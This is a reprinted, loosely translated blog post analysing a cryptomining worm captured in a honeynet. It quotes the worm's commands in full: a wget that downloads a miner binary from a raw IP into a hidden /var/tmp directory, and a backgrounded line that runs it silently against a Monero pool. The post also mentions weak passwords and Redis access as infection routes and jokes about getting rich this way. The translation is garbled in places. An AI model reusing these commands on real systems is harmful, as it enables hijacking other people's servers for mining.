Let's share a wild way to get rich in cyberspace: worm mining, Bitcoin and other virtual currencies. The following is a real case we captured. The door has opened a crack. Please explore more to avoid being suspected of being bad.

In the early morning of this morning, an interesting string appeared in our honeynet system:

[email protected]

ProtonMail！ Our sharing some time ago（ Recommend a secure and anonymous mailbox ProtonMail ）It seems to imply some coincidence, which has to arouse our interest. Unsurprisingly, anonymity is a double-edged sword. At the other end of the sword, "the evil of anonymity" will bring the ugliness of human nature to the extreme.

As I said before, the law of the dark forest also applies to this cyberspace: be found and be killed. Sorry, we "killed" each other this time.

The complete content of the above string is:

(exec /var/tmp/.war/1 -a cryptonight -o stratum+ tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x &> /dev/null &)

Let me briefly explain this Bash command:

one

Exec, which is responsible for executing the following commands, and the detailed uses can be checked by yourself.

two

/Var/tmp/. war/1, this file is created by the following command:

wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1

three

1 == minerd

four

Parameters after minute:

-a cryptonight -o stratum+ tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

Visual inspection is related to the mining of such currencies as Bitcoin, because: minerge.com is such an evil mining platform. Legal existence.

five

&> /dev/null

Ignore standard output and error output.

six

The last&indicates that the command is executed in the background.

seven

The outermost parentheses () indicate the creation of a new shell.

The above seven points should be explained, focusing on the fourth point.

To determine our "visual inspection", we use our only official email address“ [email protected] ”Also registered an account on minerge.com. After a deep experience on this platform, I have to sigh that the world of mining is really dazzling, and I can see the treasures everywhere.

On this platform, we found the following link of mining instructions:

https://minergate.com/altminers/cpuminer-multi-wolf

Screenshots of some areas are as follows:

The content in the red box is:

minerd -a cryptonight -o stratum+ tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

Compared with the fourth point above, is this confirmed? In addition, the miner itself is open source You can modify the compilation according to your special requirements.

Well, back to the beginning, this worm is actually nothing new. It is mainly spread through weak passwords and some vulnerabilities of Linux servers (such as the unauthorized access flaw of Redis).

This worm infects 10000 servers, so there are 10000 mining nodes

Let alone using 0day, we can also become "rich people" in this robust and fragile cyberspace by using some ancient technologies.

Fortunately, we are not bad people.

Is this case clear enough? Want to see more? Through the polishing of "lazy people are thinking" in the vernacular, you can ensure that even if you do not understand the technology, you can also raise your posture.

Cyberspace, this huge brain, really beautiful

Note: Reprinted from Yu Xuanda's WeChat official account